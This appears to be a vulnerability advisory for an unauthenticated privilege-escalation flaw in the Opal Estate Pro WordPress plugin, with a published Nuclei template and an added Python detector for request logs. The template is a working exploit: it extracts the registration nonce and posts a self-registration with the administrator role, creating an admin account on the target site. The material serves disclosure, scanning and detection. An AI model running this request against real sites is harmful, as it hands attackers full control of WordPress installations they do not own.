The Opal Estate Pro plugin (≤ 1.7.5) is vulnerable to privilege escalation. Due to missing role restrictions in the on_register_user function, users can register with any role. This allows unauthenticated attackers to create administrator accounts.
PoC code [published]
id: CVE-2025-6934

info:
  name: The Opal Estate Pro – Property Management <= 1.7.5 - Unauthenticated Privilege Escalation
  author: pussycat0x
  severity: critical
  description: |
    The Opal Estate Pro plugin (≤ 1.7.5) is vulnerable to privilege escalation. Due to missing role restrictions in the on_register_user function, users can register with any role. This allows unauthenticated attackers to create administrator accounts.
  impact: |
    An attacker can exploit this vulnerability to register with administrator privileges, gaining complete control over the WordPress site.
  remediation: |
    Update the Opal Estate Pro plugin to a version newer than 1.7.5 when available, or remove the plugin if not essential.
  reference:
    - https://github.com/Nxploited/CVE-2025-6934/blob/main/README.md
    - https://wordpress.org/plugins/opal-estate-pro/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-6934
    epss-score: 0.16444
    epss-percentile: 0.94638
    cwe-id: CWE-269
  metadata:
    verified: true
    max-request: 2
    vendor: themeforest
    product: opal-estate-pro
    publicwww-query: "/wp-content/plugins/opal-estate-pro/"
  tags: cve,cve2025,wordpress,wp-plugin,wp,intrusive,plugin,opalestate,vuln

flow: http(1) && http(2)

variables:
  username: "{{randstr}}"
  password: "{{to_lower(rand_text_alpha(8))}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "opalestate-register-nonce"
        internal: true

    extractors:
      - type: regex
        group: 1
        name: nonce
        part: body
        internal: true
        regex:
          - 'name="opalestate-register-nonce" value="([a-f0-9]+)"'

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&email={{email}}&password={{password}}&password1={{password}}&role=administrator&confirmed_register=on&opalestate-register-nonce={{nonce}}&_wp_http_referer=%2F&ajax=1&action=opalestate_register_form

    matchers:
      - type: dsl
        dsl:
          - contains(body, 'status\":true')
          - status_code == 200
        condition: and
# digest: 4a0a00473045022100aeef65d517adba867a626b862282a74c2df51835f59ef690212183a4b0c747e4022015041195a0bc48bc3fbac435074cda3e8b076d75b59fe71c2b2b19d31a394fb0:922c64590222798bb761d5b6d8e72950
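The registration POST the template sends is also the shape a defender should hunt for in WAF or reverse-proxy logs that record request bodies. The following Python is an added example, not code from the page or the plugin: it flags admin-ajax.php requests with action=opalestate_register_form whose role field falls outside an allowlist, run over constructed sample requests; the allowed-role set is an assumption.

```python
from urllib.parse import parse_qs

# Constructed sample of request records (method, path, form body) as a WAF or
# reverse proxy with request-body logging would capture them; not real traffic.
SAMPLE_REQUESTS = [
    # Exploit-shaped request: self-registration asking for the administrator role.
    ("POST", "/wp-admin/admin-ajax.php",
     "username=alice&email=alice%40example.com&password=pw&password1=pw"
     "&role=administrator&confirmed_register=on&opalestate-register-nonce=0123abcd"
     "&_wp_http_referer=%2F&ajax=1&action=opalestate_register_form"),
    # Benign registration through the same AJAX action with a low-privilege role.
    ("POST", "/wp-admin/admin-ajax.php",
     "username=bob&email=bob%40example.com&password=pw&password1=pw"
     "&role=subscriber&confirmed_register=on&opalestate-register-nonce=0123abcd"
     "&_wp_http_referer=%2F&ajax=1&action=opalestate_register_form"),
    # Unrelated admin-ajax traffic and a plain page load; neither should match.
    ("POST", "/wp-admin/admin-ajax.php", "action=heartbeat&_nonce=0123abcd"),
    ("GET", "/", ""),
]

# Roles a self-service form may assign (assumption: subscriber only; adjust to
# whatever roles the site actually hands out to visitors).
ALLOWED_SELF_REGISTRATION_ROLES = {"subscriber"}
# Built-in WordPress roles no visitor should ever be able to request.
PRIVILEGED_ROLES = {"administrator", "editor", "author", "contributor"}


def find_role_escalation_attempts(requests):
    """Return one finding per opalestate_register_form request that explicitly
    sets a 'role' outside the allowlist; 'privileged' marks the critical cases.
    A request that omits 'role' is left to the plugin's default and not flagged."""
    findings = []
    for method, path, body in requests:
        if method != "POST" or not path.endswith("/wp-admin/admin-ajax.php"):
            continue
        params = parse_qs(body, keep_blank_values=True)
        if params.get("action", [""])[0] != "opalestate_register_form":
            continue
        role = params.get("role", [""])[0]
        if not role or role in ALLOWED_SELF_REGISTRATION_ROLES:
            continue
        findings.append({
            "username": params.get("username", [""])[0],
            "email": params.get("email", [""])[0],
            "role": role,
            "privileged": role in PRIVILEGED_ROLES,
        })
    return findings


if __name__ == "__main__":
    for finding in find_role_escalation_attempts(SAMPLE_REQUESTS):
        print(finding)
```

A hit with privileged set to true should be followed by a check of the site's user list for accounts created around that time, since the template's success matcher only confirms the server accepted the registration.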